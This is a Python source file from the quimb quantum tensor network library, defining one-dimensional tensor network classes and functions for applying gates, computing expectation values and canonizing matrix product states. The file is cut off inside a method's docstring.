py | 1a331c43aee600b5098a000a8150a55795aa6e8b | """Classes and algorithms related to 1D tensor networks.
"""
import re
import operator
import functools
from math import log2
from numbers import Integral
import scipy.sparse.linalg as spla
from autoray import do, dag, reshape, conj, get_dtype_name, transpose
from ..utils import (
check_opt, print_multi_line, ensure_dict, partition_all, deprecated
)
import quimb as qu
from .tensor_core import (
Tensor,
TensorNetwork,
rand_uuid,
bonds,
bonds_size,
oset,
tags_to_oset,
get_tags,
PTensor,
)
from .tensor_arbgeom import tensor_network_align, tensor_network_apply_op_vec
from ..linalg.base_linalg import norm_trace_dense
from . import array_ops as ops
align_TN_1D = deprecated(
tensor_network_align, 'align_TN_1D', 'tensor_network_align')
def expec_TN_1D(*tns, compress=None, eps=1e-15):
"""Compute the expectation of several 1D TNs, using transfer matrix
compression if any are periodic.
Parameters
----------
tns : sequence of TensorNetwork1D
        The MPSs and MPOs to find the expectation of. The sequence should
        start and end with an MPS, e.g. ``(MPS, MPO, ..., MPS)``.
compress : {None, False, True}, optional
Whether to perform transfer matrix compression on cyclic systems. If
set to ``None`` (the default), decide heuristically.
eps : float, optional
The accuracy of the transfer matrix compression.
Returns
-------
x : float
The expectation value.
"""
expec_tn = functools.reduce(operator.or_, tensor_network_align(*tns))
# if OBC or <= 0.0 specified use exact contraction
cyclic = any(tn.cyclic for tn in tns)
if not cyclic:
compress = False
n = expec_tn.L
isflat = all(isinstance(tn, TensorNetwork1DFlat) for tn in tns)
# work out whether to compress, could definitely be improved ...
if compress is None and isflat:
# compression only worth it for long, high bond dimension TNs.
total_bd = qu.prod(tn.bond_size(0, 1) for tn in tns)
compress = (n >= 100) and (total_bd >= 1000)
if compress:
expec_tn.replace_section_with_svd(1, n, eps=eps, inplace=True)
return expec_tn ^ all
return expec_tn ^ ...
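# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): using ``expec_TN_1D``
# to compute the norm squared <p|p> of a random MPS. ``MPS_rand_state`` is
# imported lazily to avoid a circular import at module load time; the length
# and bond dimension are arbitrary.
def _example_expec_norm():
    from quimb.tensor import MPS_rand_state
    p = MPS_rand_state(8, bond_dim=4)
    # bra first, then ket -> should be ~1.0 since the state is normalized
    return expec_TN_1D(p.H, p)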
_VALID_GATE_CONTRACT = {False, True, 'swap+split',
'split-gate', 'swap-split-gate', 'auto-split-gate'}
_VALID_GATE_PROPAGATE = {'sites', 'register', False, True}
_TWO_BODY_ONLY = _VALID_GATE_CONTRACT - {True, False}
def maybe_factor_gate_into_tensor(G, dp, ng, where):
# allow gate to be a matrix as long as it factorizes into tensor
shape_matches_2d = (ops.ndim(G) == 2) and (G.shape[1] == dp ** ng)
shape_matches_nd = all(d == dp for d in G.shape)
if shape_matches_2d:
G = ops.asarray(G)
if ng >= 2:
G = reshape(G, [dp] * 2 * ng)
elif not shape_matches_nd:
raise ValueError(
f"Gate with shape {G.shape} doesn't match sites {where}.")
return G
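# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): a 4x4 matrix acting
# on two qubit sites (dp=2, ng=2) is reshaped into a rank-4 (2, 2, 2, 2)
# tensor, while an incompatible shape raises ``ValueError``. The identity
# gate here is an arbitrary choice.
def _example_factor_gate():
    import numpy as np
    G = maybe_factor_gate_into_tensor(np.eye(4), dp=2, ng=2, where=(0, 1))
    return G.shape  # (2, 2, 2, 2)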
def gate_TN_1D(tn, G, where, contract=False, tags=None,
propagate_tags='sites', inplace=False,
cur_orthog=None, **compress_opts):
r"""Act with the gate ``g`` on sites ``where``, maintaining the outer
indices of the 1D tensor netowork::
contract=False contract=True
. . . . <- where
o-o-o-o-o-o-o o-o-o-GGG-o-o-o
| | | | | | | | | | / \ | | |
GGG
| |
contract='split-gate' contract='swap-split-gate'
. . . . <- where
o-o-o-o-o-o-o o-o-o-o-o-o-o
| | | | | | | | | | | | | |
G~G G~G
| | \ /
X
/ \
contract='swap+split'
. . <- where
o-o-o-G=G-o-o-o
| | | | | | | |
Note that the sites in ``where`` do not have to be contiguous. By default,
site tags will be propagated to the gate tensors, identifying a
'light cone'.
Parameters
----------
tn : TensorNetwork1DVector
        The 1D vector-like tensor network, for example, an MPS.
G : array
        A square array to act with on sites ``where``. It should have twice
        as many dimensions as the number of sites. The second half of these
will be contracted with the MPS, and the first half indexed with the
correct ``site_ind_id``. Sites are read left to right from the shape.
A two-dimensional array is permissible if each dimension factorizes
correctly.
where : int or sequence of int
Where the gate should act.
contract : {False, 'split-gate', 'swap-split-gate',
'auto-split-gate', True, 'swap+split'}, optional
Whether to contract the gate into the 1D tensor network. If,
- False: leave the gate uncontracted, the default
- 'split-gate': like False, but split the gate if it is two-site.
- 'swap-split-gate': like 'split-gate', but decompose the gate as
if a swap had first been applied
- 'auto-split-gate': automatically select between the above three
options, based on the rank of the gate.
- True: contract the gate into the tensor network, if the gate acts
on more than one site, this will produce an ever larger tensor.
- 'swap+split': Swap sites until they are adjacent, then contract
the gate and split the resulting tensor, then swap the sites back
to their original position. In this way an MPS structure can be
explicitly maintained at the cost of rising bond-dimension.
tags : str or sequence of str, optional
Tag the new gate tensor with these tags.
propagate_tags : {'sites', 'register', False, True}, optional
Add any tags from the sites to the new gate tensor (only matters if
``contract=False`` else tags are merged anyway):
- If ``'sites'``, then only propagate tags matching e.g. 'I{}' and
ignore all others. I.e. just propagate the lightcone.
- If ``'register'``, then only propagate tags matching the sites of
where this gate was actually applied. I.e. ignore the lightcone,
just keep track of which 'registers' the gate was applied to.
- If ``False``, propagate nothing.
- If ``True``, propagate all tags.
inplace, bool, optional
Perform the gate in place.
compress_opts
Supplied to :meth:`~quimb.tensor.tensor_core.Tensor.split`
        if ``contract`` is one of the gate-splitting modes, or to
:meth:`~quimb.tensor.tensor_1d.MatrixProductState.gate_with_auto_swap`
if ``contract='swap+split'``.
Returns
-------
TensorNetwork1DVector
See Also
--------
MatrixProductState.gate_split
Examples
--------
>>> p = MPS_rand_state(3, 7)
>>> p.gate_(spin_operator('X'), where=1, tags=['GX'])
>>> p
<MatrixProductState(tensors=4, L=3, max_bond=7)>
>>> p.outer_inds()
('k0', 'k1', 'k2')
"""
check_opt('contract', contract, _VALID_GATE_CONTRACT)
check_opt('propagate_tags', propagate_tags, _VALID_GATE_PROPAGATE)
psi = tn if inplace else tn.copy()
if isinstance(where, Integral):
where = (where,)
ng = len(where) # number of sites the gate acts on
dp = psi.phys_dim(where[0])
tags = tags_to_oset(tags)
if (ng > 2) and contract in _TWO_BODY_ONLY:
raise ValueError(f"Can't use `contract='{contract}'` for >2 sites.")
G = maybe_factor_gate_into_tensor(G, dp, ng, where)
if contract == 'swap+split' and ng > 1:
psi.gate_with_auto_swap(G, where, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
return psi
bnds = [rand_uuid() for _ in range(ng)]
site_ix = [psi.site_ind(i) for i in where]
gate_ix = site_ix + bnds
psi.reindex_(dict(zip(site_ix, bnds)))
# get the sites that used to have the physical indices
site_tids = psi._get_tids_from_inds(bnds, which='any')
# convert the gate into a tensor - check if it is parametrized
if isinstance(G, ops.PArray):
if (ng >= 2) and (contract is not False):
raise ValueError(
"For a parametrized gate acting on more than one site "
"``contract`` must be false to preserve the array shape.")
TG = PTensor.from_parray(G, gate_ix, tags=tags, left_inds=bnds)
else:
TG = Tensor(G, gate_ix, tags=tags, left_inds=bnds)
# handle 'swap+split' only for ``ng == 1``
if contract in (True, 'swap+split'):
# pop the sites, contract, then re-add
pts = [psi._pop_tensor(tid) for tid in site_tids]
psi |= TG.contract(*pts)
return psi
# if not contracting the gate into the network, work out which tags to
# 'propagate' forward from the tensors being acted on to the gate tensors
if propagate_tags:
if propagate_tags == 'register':
old_tags = oset(map(psi.site_tag, where))
else:
old_tags = get_tags(psi.tensor_map[tid] for tid in site_tids)
if propagate_tags == 'sites':
# use regex to take tags only matching e.g. 'I0', 'I13'
rex = re.compile(psi.site_tag_id.format(r"\d+"))
old_tags = oset(filter(rex.match, old_tags))
TG.modify(tags=TG.tags | old_tags)
if ng == 1:
psi |= TG
return psi
# check if we should split multi-site gates (which may result in an easier
# tensor network to contract if we use compression)
if contract in ('split-gate', 'auto-split-gate'):
# | | | |
# GGG --> G~G
# | | | |
ts_gate_norm = TG.split(TG.inds[::2], get='tensors', **compress_opts)
# sometimes it is worth performing the decomposition *across* the gate,
# effectively introducing a SWAP
if contract in ('swap-split-gate', 'auto-split-gate'):
# \ /
# | | X
# GGG --> / \
# | | G~G
# | |
ts_gate_swap = TG.split(TG.inds[::3], get='tensors', **compress_opts)
# like 'split-gate' but check the rank for swapped indices also, and if no
# rank reduction, simply don't swap
if contract == 'auto-split-gate':
# | | \ /
# | | | | X | |
# GGG --> G~G or / \ or ... GGG
# | | | | G~G | |
# | | | |
norm_rank = bonds_size(*ts_gate_norm)
swap_rank = bonds_size(*ts_gate_swap)
if swap_rank < norm_rank:
contract = 'swap-split-gate'
elif norm_rank < dp**ng:
contract = 'split-gate'
else:
# else no rank reduction available - leave as ``contract=False``.
contract = False
if contract == 'swap-split-gate':
ts_gate = ts_gate_swap
elif contract == 'split-gate':
ts_gate = ts_gate_norm
else:
ts_gate = (TG,)
# if we are splitting the gate then only add site tags on the tensors
# directly 'above' the site
if contract in ('split-gate', 'swap-split-gate'):
if propagate_tags == 'register':
ts_gate[0].drop_tags(psi.site_tag(where[1]))
ts_gate[1].drop_tags(psi.site_tag(where[0]))
for t in ts_gate:
psi |= t
return psi
def superop_TN_1D(tn_super, tn_op,
upper_ind_id='k{}',
lower_ind_id='b{}',
so_outer_upper_ind_id=None,
so_inner_upper_ind_id=None,
so_inner_lower_ind_id=None,
so_outer_lower_ind_id=None):
r"""Take a tensor network superoperator and act with it on a
tensor network operator, maintaining the original upper and lower
indices of the operator::
outer_upper_ind_id upper_ind_id
| | | ... | | | | ... |
+----------+ +----------+
| tn_super +---+ | tn_super +---+
+----------+ | upper_ind_id +----------+ |
| | | ... | | | | | ... | | | | ... | |
inner_upper_ind_id| +-----------+ +-----------+ |
| + | tn_op | = | tn_op | |
inner_lower_ind_id| +-----------+ +-----------+ |
| | | ... | | | | | ... | | | | ... | |
+----------+ | lower_ind_id +----------+ |
| tn_super +---+ | tn_super +---+
+----------+ +----------+
| | | ... | <-- | | | ... |
outer_lower_ind_id lower_ind_id
Parameters
----------
tn_super : TensorNetwork
The superoperator in the form of a 1D-like tensor network.
tn_op : TensorNetwork
The operator to be acted on in the form of a 1D-like tensor network.
upper_ind_id : str, optional
Current id of the upper operator indices, e.g. usually ``'k{}'``.
lower_ind_id : str, optional
Current id of the lower operator indices, e.g. usually ``'b{}'``.
so_outer_upper_ind_id : str, optional
Current id of the superoperator's upper outer indices, these will be
reindexed to form the new effective operators upper indices.
so_inner_upper_ind_id : str, optional
Current id of the superoperator's upper inner indices, these will be
joined with those described by ``upper_ind_id``.
so_inner_lower_ind_id : str, optional
Current id of the superoperator's lower inner indices, these will be
joined with those described by ``lower_ind_id``.
so_outer_lower_ind_id : str, optional
Current id of the superoperator's lower outer indices, these will be
reindexed to form the new effective operators lower indices.
Returns
-------
KAK : TensorNetwork
        The tensor network of the superoperator acting on the operator.
"""
n = tn_op.L
if so_outer_upper_ind_id is None:
so_outer_upper_ind_id = getattr(tn_super, 'outer_upper_ind_id', 'kn{}')
if so_inner_upper_ind_id is None:
so_inner_upper_ind_id = getattr(tn_super, 'inner_upper_ind_id', 'k{}')
if so_inner_lower_ind_id is None:
so_inner_lower_ind_id = getattr(tn_super, 'inner_lower_ind_id', 'b{}')
if so_outer_lower_ind_id is None:
so_outer_lower_ind_id = getattr(tn_super, 'outer_lower_ind_id', 'bn{}')
reindex_map = {}
for i in range(n):
upper_bnd = rand_uuid()
lower_bnd = rand_uuid()
reindex_map[upper_ind_id.format(i)] = upper_bnd
reindex_map[lower_ind_id.format(i)] = lower_bnd
reindex_map[so_inner_upper_ind_id.format(i)] = upper_bnd
reindex_map[so_inner_lower_ind_id.format(i)] = lower_bnd
reindex_map[so_outer_upper_ind_id.format(i)] = upper_ind_id.format(i)
reindex_map[so_outer_lower_ind_id.format(i)] = lower_ind_id.format(i)
return tn_super.reindex(reindex_map) & tn_op.reindex(reindex_map)
class TensorNetwork1D(TensorNetwork):
"""Base class for tensor networks with a one-dimensional structure.
"""
_NDIMS = 1
_EXTRA_PROPS = ('_site_tag_id', '_L')
_CONTRACT_STRUCTURED = True
def _compatible_1d(self, other):
"""Check whether ``self`` and ``other`` are compatible 2D tensor
networks such that they can remain a 2D tensor network when combined.
"""
return (
isinstance(other, TensorNetwork1D) and
all(getattr(self, e) == getattr(other, e)
for e in TensorNetwork1D._EXTRA_PROPS)
)
def __and__(self, other):
new = super().__and__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
def __or__(self, other):
new = super().__or__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
@property
def L(self):
"""The number of sites.
"""
return self._L
@property
def nsites(self):
"""The number of sites.
"""
return self._L
def gen_site_coos(self):
return tuple(i for i in range(self.L) if
self.site_tag(i) in self.tag_map)
@property
def site_tag_id(self):
"""The string specifier for tagging each site of this 1D TN.
"""
return self._site_tag_id
def site_tag(self, i):
        """The name of the tag specifying the tensor at site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_tag_id.format(i)
def slice2sites(self, tag_slice):
"""Take a slice object, and work out its implied start, stop and step,
taking into account cyclic boundary conditions.
Examples
--------
Normal slicing:
>>> p = MPS_rand_state(10, bond_dim=7)
>>> p.slice2sites(slice(5))
(0, 1, 2, 3, 4)
>>> p.slice2sites(slice(4, 8))
(4, 5, 6, 7)
Slicing from end backwards:
>>> p.slice2sites(slice(..., -3, -1))
(9, 8)
Slicing round the end:
>>> p.slice2sites(slice(7, 12))
(7, 8, 9, 0, 1)
>>> p.slice2sites(slice(-3, 2))
(7, 8, 9, 0, 1)
If the start point is > end point (*before* modulo n), then step needs
to be negative to return anything.
"""
if tag_slice.start is None:
start = 0
elif tag_slice.start is ...:
if tag_slice.step == -1:
start = self.L - 1
else:
start = -1
else:
start = tag_slice.start
if tag_slice.stop in (..., None):
stop = self.L
else:
stop = tag_slice.stop
step = 1 if tag_slice.step is None else tag_slice.step
return tuple(s % self.L for s in range(start, stop, step))
def maybe_convert_coo(self, x):
"""Check if ``x`` is an integer and convert to the
corresponding site tag if so.
"""
if isinstance(x, Integral):
return (self.site_tag(x),)
if isinstance(x, slice):
return tuple(map(self.site_tag, self.slice2sites(x)))
return x
def _get_tids_from_tags(self, tags, which='all'):
"""This is the function that lets single integers be used for many
'tag' based functions.
"""
tags = self.maybe_convert_coo(tags)
return super()._get_tids_from_tags(tags, which=which)
def retag_sites(self, new_id, where=None, inplace=False):
"""Modify the site tags for all or some tensors in this 1D TN
(without changing the ``site_tag_id``).
"""
if where is None:
where = self.gen_site_coos()
return self.retag({self.site_tag(i): new_id.format(i) for i in where},
inplace=inplace)
@site_tag_id.setter
def site_tag_id(self, new_id):
if self._site_tag_id != new_id:
self.retag_sites(new_id, inplace=True)
self._site_tag_id = new_id
@property
def site_tags(self):
"""An ordered tuple of the actual site tags.
"""
return tuple(map(self.site_tag, self.gen_site_coos()))
@property
def sites(self):
return tuple(self.gen_site_coos())
@functools.wraps(tensor_network_align)
def align(self, *args, inplace=False, **kwargs):
return tensor_network_align(self, *args, inplace=inplace, **kwargs)
align_ = functools.partialmethod(align, inplace=True)
def contract_structured(
self,
tag_slice,
structure_bsz=5,
inplace=False,
**opts
):
"""Perform a structured contraction, translating ``tag_slice`` from a
``slice`` or `...` to a cumulative sequence of tags.
Parameters
----------
tag_slice : slice or ...
The range of sites, or `...` for all.
inplace : bool, optional
Whether to perform the contraction inplace.
Returns
-------
TensorNetwork, Tensor or scalar
The result of the contraction, still a ``TensorNetwork`` if the
contraction was only partial.
See Also
--------
contract, contract_tags, contract_cumulative
"""
        # ``...`` means contract over all sites
        if tag_slice is ...:
tag_slice = slice(0, self.L)
# filter sites by the slice, but also which sites are present at all
tags_seq = filter(self.tag_map.__contains__,
map(self.site_tag, self.slice2sites(tag_slice)))
# partition sites into `structure_bsz` groups
if structure_bsz > 1:
tags_seq = partition_all(structure_bsz, tags_seq)
# contract each block of sites cumulatively
return self.contract_cumulative(tags_seq, inplace=inplace, **opts)
def __repr__(self):
"""Insert length and max bond into standard print.
"""
s = super().__repr__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-2]}{extra}{s[-2:]}'
return s
def __str__(self):
"""Insert length and max bond into standard print.
"""
s = super().__str__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-1]}{extra}{s[-1:]}'
return s
class TensorNetwork1DVector(TensorNetwork1D,
TensorNetwork):
"""1D Tensor network which overall is like a vector with a single type of
site ind.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'_L',
)
def reindex_all(self, new_id, inplace=False):
"""Reindex all physical sites and change the ``site_ind_id``.
"""
tn = self if inplace else self.copy()
tn.site_ind_id = new_id
return tn
reindex_all_ = functools.partialmethod(reindex_all, inplace=True)
def reindex_sites(self, new_id, where=None, inplace=False):
"""Update the physical site index labels to a new string specifier.
        Note that this does not change the ``site_ind_id`` stored on the TN.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
indices = self.gen_site_coos()
elif isinstance(where, slice):
indices = self.slice2sites(where)
else:
indices = where
return self.reindex({self.site_ind(i): new_id.format(i)
for i in indices}, inplace=inplace)
reindex_sites_ = functools.partialmethod(reindex_sites, inplace=True)
def _get_site_ind_id(self):
return self._site_ind_id
def _set_site_ind_id(self, new_id):
if self._site_ind_id != new_id:
self.reindex_sites_(new_id)
self._site_ind_id = new_id
site_ind_id = property(_get_site_ind_id, _set_site_ind_id,
doc="The string specifier for the physical indices")
def site_ind(self, i):
"""Get the physical index name of site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_ind_id.format(i)
@property
def site_inds(self):
"""An ordered tuple of the actual physical indices.
"""
return tuple(map(self.site_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense ket version of this 1D vector, i.e. a
``qarray`` with shape (-1, 1).
"""
if not inds_seq:
# just use list of site indices
return do('reshape', TensorNetwork.to_dense(
self, self.site_inds, **contract_opts
), (-1, 1))
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None):
if i is None:
i = next(iter(self.gen_site_coos()))
return self.ind_size(self.site_ind(i))
@functools.wraps(gate_TN_1D)
def gate(self, *args, inplace=False, **kwargs):
return gate_TN_1D(self, *args, inplace=inplace, **kwargs)
gate_ = functools.partialmethod(gate, inplace=True)
@functools.wraps(expec_TN_1D)
def expec(self, *args, **kwargs):
return expec_TN_1D(self, *args, **kwargs)
def correlation(self, A, i, j, B=None, **expec_opts):
"""Correlation of operator ``A`` between ``i`` and ``j``.
Parameters
----------
A : array
The operator to act with, can be multi site.
i : int or sequence of int
The first site(s).
j : int or sequence of int
The second site(s).
expec_opts
Supplied to :func:`~quimb.tensor.tensor_1d.expec_TN_1D`.
Returns
-------
C : float
The correlation ``<A(i)> + <A(j)> - <A(ij)>``.
Examples
--------
>>> ghz = (MPS_computational_state('0000') +
... MPS_computational_state('1111')) / 2**0.5
>>> ghz.correlation(pauli('Z'), 0, 1)
1.0
>>> ghz.correlation(pauli('Z'), 0, 1, B=pauli('X'))
0.0
"""
if B is None:
B = A
bra = self.H
pA = self.gate(A, i, contract=True)
cA = expec_TN_1D(bra, pA, **expec_opts)
pB = self.gate(B, j, contract=True)
cB = expec_TN_1D(bra, pB, **expec_opts)
pAB = pA.gate_(B, j, contract=True)
cAB = expec_TN_1D(bra, pAB, **expec_opts)
return cAB - cA * cB
class TensorNetwork1DOperator(TensorNetwork1D,
TensorNetwork):
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'_L',
)
def reindex_lower_sites(self, new_id, where=None, inplace=False):
"""Update the lower site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g.
``"ket{}"``.
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.lower_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_lower_sites_ = functools.partialmethod(
reindex_lower_sites, inplace=True)
def reindex_upper_sites(self, new_id, where=None, inplace=False):
"""Update the upper site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.upper_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_upper_sites_ = functools.partialmethod(
reindex_upper_sites, inplace=True)
def _get_lower_ind_id(self):
return self._lower_ind_id
def _set_lower_ind_id(self, new_id):
if new_id == self._upper_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._lower_ind_id != new_id:
self.reindex_lower_sites_(new_id)
self._lower_ind_id = new_id
lower_ind_id = property(
_get_lower_ind_id, _set_lower_ind_id,
doc="The string specifier for the lower phyiscal indices")
def lower_ind(self, i):
"""The name of the lower ('ket') index at site ``i``.
"""
return self.lower_ind_id.format(i)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
return tuple(map(self.lower_ind, self.gen_site_coos()))
def _get_upper_ind_id(self):
return self._upper_ind_id
def _set_upper_ind_id(self, new_id):
if new_id == self._lower_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._upper_ind_id != new_id:
self.reindex_upper_sites_(new_id)
self._upper_ind_id = new_id
upper_ind_id = property(_get_upper_ind_id, _set_upper_ind_id,
doc="The string specifier for the upper phyiscal "
"indices")
def upper_ind(self, i):
"""The name of the upper ('bra') index at site ``i``.
"""
return self.upper_ind_id.format(i)
@property
def upper_inds(self):
"""An ordered tuple of the actual upper physical indices.
"""
return tuple(map(self.upper_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense matrix version of this 1D operator, i.e. a
``qarray`` with shape (d, d).
"""
if not inds_seq:
inds_seq = (self.upper_inds, self.lower_inds)
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None, which='upper'):
"""Get a physical index size of this 1D operator.
"""
if i is None:
i = next(iter(self.gen_site_coos()))
if which == 'upper':
return self[i].ind_size(self.upper_ind(i))
if which == 'lower':
return self[i].ind_size(self.lower_ind(i))
def set_default_compress_mode(opts, cyclic=False):
opts.setdefault('cutoff_mode', 'rel' if cyclic else 'rsum2')
class TensorNetwork1DFlat(TensorNetwork1D,
TensorNetwork):
"""1D Tensor network which has a flat structure.
"""
_EXTRA_PROPS = ('_site_tag_id', '_L')
def _left_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i + 1]
rix, lix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
Q, R = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
R = R @ T2
Q.transpose_like_(T1)
R.transpose_like_(T2)
self[i].modify(data=Q.data)
self[i + 1].modify(data=R.data)
if bra is not None:
bra[i].modify(data=Q.data.conj())
bra[i + 1].modify(data=R.data.conj())
def _right_decomp_site(self, i, bra=None, **split_opts):
T1, T2 = self[i], self[i - 1]
lix, rix = T1.filter_bonds(T2)
set_default_compress_mode(split_opts, self.cyclic)
L, Q = T1.split(lix, get='tensors', right_inds=rix, **split_opts)
L = T2 @ L
L.transpose_like_(T2)
Q.transpose_like_(T1)
self[i - 1].modify(data=L.data)
self[i].modify(data=Q.data)
if bra is not None:
bra[i - 1].modify(data=L.data.conj())
bra[i].modify(data=Q.data.conj())
def left_canonize_site(self, i, bra=None):
r"""Left canonize this TN's ith site, inplace::
i i
-o-o- ->-s-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i + 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._left_decomp_site(i, bra=bra, method='qr')
def right_canonize_site(self, i, bra=None):
r"""Right canonize this TN's ith site, inplace::
i i
-o-o- -s-<-
... | | ... ==> ... | | ...
Parameters
----------
i : int
Which site to canonize. The site at i - 1 also absorbs the
non-isometric part of the decomposition of site i.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate canonization.
"""
self._right_decomp_site(i, bra=bra, method='lq')
def left_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Left canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
>->->->->->->-o-o- +-o-o-
| | | | | | | | | ... => | | | ...
>->->->->->->-o-o- +-o-o-
Parameters
----------
start : int, optional
If given, the site to start left canonizing at.
stop : int, optional
If given, the site to stop left canonizing at.
normalize : bool, optional
Whether to normalize the state, only works for OBC.
bra : MatrixProductState, optional
If supplied, simultaneously left canonize this MPS too, assuming it
to be the conjugate state.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_canonize_site(i, bra=bra)
if normalize:
factor = self[-1].norm()
self[-1] /= factor
if bra is not None:
bra[-1] /= factor
def right_canonize(self, stop=None, start=None, normalize=False, bra=None):
r"""Right canonize all or a portion of this TN. If this is a MPS,
this implies that::
i i
-o-o-<-<-<-<-<-<-< -o-o-+
... | | | | | | | | | -> ... | | |
-o-o-<-<-<-<-<-<-< -o-o-+
Parameters
----------
start : int, optional
If given, the site to start right canonizing at.
stop : int, optional
If given, the site to stop right canonizing at.
normalize : bool, optional
Whether to normalize the state.
bra : MatrixProductState, optional
If supplied, simultaneously right canonize this MPS too, assuming
it to be the conjugate state.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_canonize_site(i, bra=bra)
if normalize:
factor = self[0].norm()
self[0] /= factor
if bra is not None:
bra[0] /= factor
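    # Sketch of a full canonization sweep, assuming ``MPS_rand_state`` from
    # ``quimb.tensor`` is importable; the conjugate state is kept in step via
    # ``bra``:
    #
    #     >>> k = MPS_rand_state(10, bond_dim=7)
    #     >>> b = k.H
    #     >>> k.left_canonize(normalize=True, bra=b)
    #     >>> k.count_canonized()         # typically (9, 0) afterwards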
def canonize_cyclic(self, i, bra=None, method='isvd', inv_tol=1e-10):
"""Bring this MatrixProductState into (possibly only approximate)
canonical form at site(s) ``i``.
Parameters
----------
i : int or slice
The site or range of sites to make canonical.
bra : MatrixProductState, optional
Simultaneously canonize this state as well, assuming it to be the
co-vector.
method : {'isvd', 'svds', ...}, optional
How to perform the lateral compression.
inv_tol : float, optional
Tolerance with which to invert the gauge.
"""
if isinstance(i, Integral):
start, stop = i, i + 1
elif isinstance(i, slice):
start, stop = i.start, i.stop
else:
start, stop = min(i), max(i) + 1
if tuple(i) != tuple(range(start, stop)):
raise ValueError("Parameter ``i`` should be an integer or "
f"contiguous block of integers, got {i}.")
k = self.copy()
b = k.H
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k & b
# approximate the rest of the chain with a separable transfer operator
kbc = kb.replace_section_with_svd(start, stop, eps=0.0, which='!any',
method=method, max_bond=1,
ltags='_LEFT', rtags='_RIGHT')
EL = kbc['_LEFT'].squeeze()
# explicitly symmetrize to hermitian
EL.modify(data=(EL.data + dag(EL.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
EL_lix, = EL.bonds(kbc[k.site_tag(start), '_BRA'])
_, x = EL.split(EL_lix, method='eigh', cutoff=-1, get='arrays')
ER = kbc['_RIGHT'].squeeze()
# explicitly symmetrize to hermitian
ER.modify(data=(ER.data + dag(ER.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
ER_lix, = ER.bonds(kbc[k.site_tag(stop - 1), '_BRA'])
_, y = ER.split(ER_lix, method='eigh', cutoff=-1, get='arrays')
self.insert_gauge(x, start - 1, start, tol=inv_tol)
self.insert_gauge(y, stop, stop - 1, tol=inv_tol)
if bra is not None:
for i in (start - 1, start, stop, stop - 1):
bra[i].modify(data=self[i].data.conj())
def shift_orthogonality_center(self, current, new, bra=None):
"""Move the orthogonality center of this MPS.
Parameters
----------
current : int
The current orthogonality center.
new : int
The target orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously move the orthogonality center of this
MPS too, assuming it to be the conjugate state.
"""
if new > current:
for i in range(current, new):
self.left_canonize_site(i, bra=bra)
else:
for i in range(current, new, -1):
self.right_canonize_site(i, bra=bra)
def canonize(self, where, cur_orthog='calc', bra=None):
r"""Mixed canonize this TN. If this is a MPS, this implies that::
i i
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
| | | | |...| | |...| | | | | -> | | |
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
You can also supply a set of indices to orthogonalize around, and a
current location of the orthogonality center for efficiency::
current where
....... .....
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
| | | | | | | | | | | | | -> | | | | | | | | | | | | |
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
cmin cmax i j
This would only move ``cmin`` to ``i`` and ``cmax`` to ``j`` if
necessary.
Parameters
----------
where : int or sequence of int
Which site(s) to orthogonalize around. If a sequence of int then
make sure that section from min(where) to max(where) is orthog.
